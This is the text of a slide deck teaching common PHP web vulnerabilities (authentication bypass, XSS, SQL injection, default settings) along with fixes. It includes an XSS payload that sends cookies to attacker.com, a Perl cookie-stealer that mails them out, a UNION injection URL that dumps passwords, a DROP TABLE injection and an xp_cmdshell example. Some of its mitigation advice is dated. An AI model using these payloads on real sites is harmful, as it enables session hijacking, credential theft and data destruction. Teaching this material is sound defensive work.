Web Vulnerability

Saharudin Saat

Session_start();

The most common

• No session control (bypass authentication)

• XSS attack (cross site scripting)

• Sql Injection

• Default?

Session Control

Is this site vulnerable?

Session Control

• User need to login before access system• Does the code really process the username and

password? • In This case – no login required• We can bypass the login page just by inserting the url

http://localhost/latihan/home.php

Session Control

Intruder can bypass your system just by inserting the url page!!

Session Control

RecommendationUse session session_start();

– Every sensitive page must have access level controlE.G if($level =='1')

{header("Location: admin_menu.php");

}else if($level=='2'){

header("Location: approve.php");} else if($level=='4'){

header("Location: report.php");

Session Controlif($pwd==''){?> <script language="javascript">alert("not authorized!!");window.location = "index.php";</script>

Validation process need to be on server site to prevent code injection.

Refer to e-rent folder file name session.php

check if no password enteredredirect to login page again.

XSS (cross site scripting)

XSS (cross site scripting)

• By the succesful code injection into username input box <script>alert(“Boleh xss”)</script> we know that this site is vulnerable to xss attack.

• The attacker can do social engineer his victims by clicking on the malicious url to steal cookies (phishing)

XSS (cross site scripting)

XSS (cross site scripting)<html><head><title>Look at this!</title></head><body><ahref="http://hotwired.lycos.com/

webmonkey/00/18/index3a_page2.html?tw=<script>document.location.replace('http://attacker.com/

steal.cgi?'+document.cookie);</script>"onMouseOver="window.status='http://www.cnn.com/2002/

SHOWBIZ/News/05/02/clinton.talkshow.reut/index.html';return true"onMouseOut="window.status='';return true"> Check this

CNN story out!</a></body></html>

XSS (cross site scripting)# The QUERY_STRING environment variable should be

filled with# the cookie text after steal.cgi:# http://www.attacker.com/steal.cgi?XXXXXprint COOKIES “$ENV{'QUERY_STRING'} from

$ENV{‘REMOTE_ADDR’}\n”;# now email the alert as well so we can start to hijackopen(MAIL,"|$mailprog -t");print MAIL "To: attacker\@attacker.com\n";print MAIL "From: cookie_steal\@attacker.com\n";print MAIL "Subject: Stolen Cookie Submission\n\n";print MAIL "-" x 75 . "\n\n";print MAIL “$ENV{'QUERY_STRING'} from

$ENV{‘REMOTE_ADDR’}\n”;close (MAIL);

XSS (cross site scripting)

Recommendation

• Use POST rather than GET in forms. Specify POST in the method attribute of your forms. Of course, this isn't appropriate for all of your forms, but it is appropriate when a form is performing an action, such as buying stocks. In fact, the HTTP specification requires that GET be considered safe.

• Use $_POST rather than rely on register_globals. Using the POST method for form submissions is useless if you rely on register_globals and reference form variables like $symbol and $quantity. It is also useless if you use $_REQUEST.

• Do not focus on convenience.

SQL injection

Simple sql injection to use valid username and password

SQL injection

Attacker use the first valid user in table login

SQL injection

• Attacker might be lucky if the first name inside table login is an administrator.

• If not? he might want to find administrator login and password

• Can the attacker do that?

SQL injection

By inserting union statement in the url, attacker can view all login and password

SQL injection

• The original url appear like this http://localhost/latihan/staffdetail.php?nostaf=654321

• Attacker then might try to do union sql statement to view username and password inside login table which appear like this : -http://localhost/latihan/staffdetail.php?nostaf=654321%20union%20select%201,2,userid,katalaluan%20from%20administrator

*Note %20 is unicode for space.

SQL injection

• If sql injection is possible, it is not impossible for attacker to drop table by adding drop table statement SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM DATA WHERE name LIKE '%';

• In some case, attacker making "EXEC xp_cmdshell 'dir c:'" the @query argument to view the output of

"dir c:" in the webpage.

SQL injection

Recommendation

Filter your data. • This cannot be overstressed. With good data filtering in place, most

security concerns are mitigated, and some are practically eliminated.

Quote your data. • If your database allows it (MySQL does), put single quotes around all

values in your SQL statements, regardless of the data type.

Escape your data. • Sometimes valid data can unintentionally interfere with the format of

the SQL statement itself. Use mysql_escape_string() or an escaping function native to your particular database. If there isn't a specific one, addslashes() is a good last resort.

Default?

Do you realize that other people on the internet can view your default setting?

Default?

Pay attention for any alert from the third party software about your web security

Default?

Attacker might browse your server files to find any information

References

• Security focus-http://www.securityfocus.com/

• Packetstorm-http://packetstormsecurity.org/

• Milw0rm-www.milw0rm.com/

• Insecure.org-

http://sectools.org/web-scanners.html

session_destroy();

Thank You